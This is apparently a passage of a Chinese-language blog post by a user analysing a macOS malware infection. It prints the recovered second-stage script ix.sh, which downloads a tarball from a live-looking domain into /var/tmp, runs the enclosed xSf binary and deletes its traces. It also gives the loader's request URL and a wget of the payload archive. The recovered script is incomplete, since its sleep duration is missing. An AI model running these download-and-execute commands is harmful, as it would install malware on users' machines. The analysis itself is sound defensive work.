然后获取这个 data 中的 up 字段；如果没有 up 字段，就读取 /Users/dengzhongqiang/Library/DataSave/u1 文件的内容:

内容是一个 url。然后请求这个 URL，如果返回的数据长度大于 10，则把这个内容写入到 /tmp/ix.sh 中，并加入可执行权限，然后执行。执行完成之后过 2 秒就删除这个 ix.sh 脚本。

完整的请求地址是:

http://i.swiftinstaller.top/c/ci?ct=clpy&tm=1&id=7B97AA40-7A19-5F8C-B050-35A7D8D8F8B3&mvr=10.14.5

id字段是这段代码的返回值,

IORegistryEntryCreateCFProperty(IOServiceGetMatchingService(0,IOServiceMatching("IOPlatformExpertDevice")),'IOPlatformUUID',None,0)
妈个逼的，用 postman 模拟请求一直返回 1，很想知道 ix.sh 里的内容是啥。决定用数据恢复软件恢复一波，看能不能找回来，看一下恶意程序的真容。
拿到了 ix.sh 的内容。
#!/bin/bash
# ix.sh, the second stage the Python loader above drops into /tmp and runs.
# It pulls a tarball into /var/tmp, unpacks and starts the payload, then
# removes its own files from a backgrounded function.
/usr/bin/curl -s -L -o /var/tmp/xSf.tgz "http://www.qaeqxa.pw/static/s3/exec6625/exec.tgz"   # -s silent, -L follow redirects
mkdir -p /var/tmp/xSf
tar -xzf /var/tmp/xSf.tgz -C /var/tmp/xSf/
cd /var/tmp/xSf/
./xSf   # the actual payload binary (the one the author later scans)
# Cleanup runs in the background after a delay, presumably so the payload
# has started before its archive and directory disappear.
func_cccc(){
    sleep   # NOTE(review): the duration is missing from this recovered copy; the write-up reports a 120 s delay
    rm -rf /var/tmp/xSf
    rm -rf /var/tmp/xSf.tgz
}
func_cccc &

可以知道，它下载了 exec.tgz。我执行命令把这个文件下载下来:

# Fetch the second-stage archive referenced by ix.sh for offline analysis and
# unpack it into ./bingdu/ (tar -C requires the directory to exist already).
wget  http://www.qaeqxa.pw/static/s3/exec6625/exec.tgz

tar -xzf exec.tgz -C ./bingdu/

拿到了真正的病毒程序: xSf

这个程序隐藏得真深，延时 120 秒后就删除了，杀毒软件肯定也就找不到它了。

用杀毒软件直接扫描这个程序: 

最终找到了写病毒的人,他叫:  batman

老子要报警.
